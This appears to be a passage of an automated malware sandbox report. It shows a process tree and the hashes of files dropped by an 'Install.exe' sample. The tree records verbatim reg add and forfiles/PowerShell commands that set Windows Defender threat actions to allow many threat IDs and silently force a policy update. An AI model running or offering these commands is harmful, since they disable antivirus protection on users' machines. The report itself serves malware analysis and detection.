                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5532
                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5432
                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1112
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5788
                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5804
                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3368
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2080
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:696
                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4088
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3052
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS7E58.tmp\Install.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS7E58.tmp\Install.exe it /GahdidtwBo 385118 /S
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:6136
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3976
                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4740
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:5368
                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:4428
                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5212
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:2804
                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5992
                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6100
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3876
                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:5388
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5764
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:4932
                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:5744
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3612
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:6116
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  PID:1156
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:6112
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5112 -ip 5112
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5468
                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6076

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                              • C:\ProgramData\Are.docx

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                              • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                593KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                              • C:\ProgramData\nss3.dll

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                1d7f3d1036cc09d2b9c5d8d5acfbb867

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                5a76ade3e2ced7d72b6ce450b074d3c5aaa13b85

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                0725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                21KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                af64209478ab9e5f82665a0bc5e79940

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                81a5360c06647f15b73edb8db1e26f17b8dc9df4

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                fe52fe5d64d29ad486a9d8764d6aa528d1999e36b3804ea51840b27f61e905f5

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                945216ff037716aac1d00205064b8692f41da7b132fa1216242428aa32db13d61c0e76d18bb891fe6355c4c28ecb36781bbd04f6f5666a9efb0dc5d54a82e721

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                21KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                b005658c785fdf978539cfc64a954d7e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                77a3b194b3cae0ed1b9581540bb6da3823db5c89

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                bf8eb6102849171a3f780772e56d86937e73df415a2f10b38f057f664e106342

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                325fda7f1a64d05fc0876b08d1ba33c29e8914118a263a37db025228b0957d54789f63d387e6ff4c56046d427ce7a010da541ed88278022466a2c35220119c6e

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                944B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d28a889fd956d5cb3accfbaf1143eb6f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                157ba54b365341f8ff06707d996b3635da8446f7

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                44904375f4e32aba9fd00bdf6ac64829

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                1ab824a1998f275e45030143da810b5a8db5b205

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                328b1c7136f7a0ecbe3be3bfefc85753ce17553381bb1bd242f5262737957fb6

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                5101a5928a93c055a7b3b4c947d1df2ff73a1c285747e08f1fab58755aa5e9d446992ca04d40a12a980ff2b6002d4d6c8889aee587f6e3266b1ae90ed6055528

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                3db0071ededb4a18cd6c295ce928b108

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                1c0beac5669c63f84fa7925de2c113557114e678

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                d074307b023cfe7e8fa090033945fd7458b5a055e6975a8116d14cd45c7801f2

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                5174c6bb8e4c50a215a55d955f77ae0c22c32fe77376d88f6aeed0343e8a4e6dedcc6e3fbe4784389a704583d919816ddfd03b680d799150c4dfc104a445d04d

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS7501.tmp\Install.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.4MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                220a02a940078153b4063f42f206087b

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                02fc647d857573a253a1ab796d162244eb179315

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS7501.tmp\Install.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                f39f937574a053a12a8b5727f8bb9fb7

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                5924033be852bc3650ff7f3ecef155df3824742c

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                69e7d1c1e89e2b4a764c2cf6705f5c24e737ecae7692cbe941140ed26551c2ab

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                aee3710ffbbf5c6ec150a7f5caef6eed10e34d94e18246360d62c4871eb54eda108c92eb0f83aa864ff3dab01b720a6b644fe9fb228e0ab5d687e08572f66c2b

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS7E58.tmp\Install.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5.8MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                ec6d17692c3c9b01ad39cb292f0c2572

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                2dd4f85c2e9045005dfa44922288efc9d46bcee4

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                7c2e7becd21f2d7540bb9c0dc50a01b3c179716a3dd6cbcac1449dbb0f3dd9a9

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                24170b26bf59b0eb08beb0c4a3c62d9a35440b4d459e42c15e7dd4173f561739c982343a988f33b5131b7941193612be2c12b5235b04feb9ddc3cf864de0ccc4

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS7E58.tmp\Install.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5.0MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                db665596d9875fe8025a6a13c1ae061a

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                8147469776acb568839abbca25ad70293f60fb8e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                354c3adc8352da319887f315695a6c4a8a3fb151392bd7127b1ddda549f15402

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                f67a1ccef922eb0c31300abd69251c2ae7df82e6cef2ffebeae3626d2652885c6e6e5d8fcc16b20942e26319461e390312b426fe606db4156d6ba6f69a19597a

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4p0sok2.wdc.ps1

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                60B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                e3b708e6dbec56255c644c1a62d1387b

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                a1fbd2e27c302e94065974c94434cb19704d400c

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                51c745a2405e47ec2b44f5cfb9b19b8ad337d1a89c40f0f79c50b86e552f2fc8

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                dbe1abb344326701cff62a88da92592e518a4c6ca18d55d853202834105e05e8659a16f93cf1ad625d1f4b9923100d147b43595a976dd7ec26c6a3808090a59b

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                7660db8e2f8ca654218d7bbd61df9d4c

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                c458a524a15559b2788ebb240a8d50cdf39a054a

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                8c5a31ce7380c6b9e974d86a862eb1ae184806fac9b15b40398b19456e157fa6

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                1c7ce71828f2a17bfc2ee48bae91a476a7e21fe9f447212070bc4be4e04499e5c24966812a33c6857c765de4be092e81c1b09e9d5a0d76c6318e44b63ffeef9d

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\u3qk.0.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                245KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                dd87d2cb25ca0057e220c143dd4b628e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                48238804ea2bee1cb0cf1e1c946a12bfc1265a15

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                e07d3383a78b7b05cd27cf2f569c6e93026e9f40dff4ccb8ec81efafa6b2b23f

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                bc7a14eb4b49df3f99028b1ae6dadf6bbca205d564c13c7dc2d05641a9e0d06558eb0bf67aaf51cf5c9c70c9963fe6265755259dae8e643484b0124796f57ff3

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\u3qk.1.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.6MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                397926927bca55be4a77839b1c44de6e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                e10f3434ef3021c399dbba047832f02b3c898dbd

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

                                                                                                                                                                                                              • C:\Users\Admin\Pictures\4gI7L81mG1osxawOScTUtwHG.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                387KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                5fdf9311309c4d0ccfd96f81cc423221

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                552b94b6bd496a9ed2ce32957b51c20972e22211

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                6d55ceb63d5c42b83b950810b2d32965ffe698af5ffc84f695ee16ac29e4ff13

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                3bc70e7a5e2cfc18ab687ae607af853f46dee55bd4101198e2c508386e4d4fa6a34a55a6650e3507e7e697aea49c421b2fbb0a487d09df79db52ba20adf88cce

                                                                                                                                                                                                              • C:\Users\Admin\Pictures\EMZe1b9QW5eAo1C2VDDrZqoF.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4.1MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                783195397ccb7d465a1f025af541e853

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                f07c0e3836f6ad7df1dac81f255bd3cb4ea8d18e

                                                                                                                                                                                                                SHA256

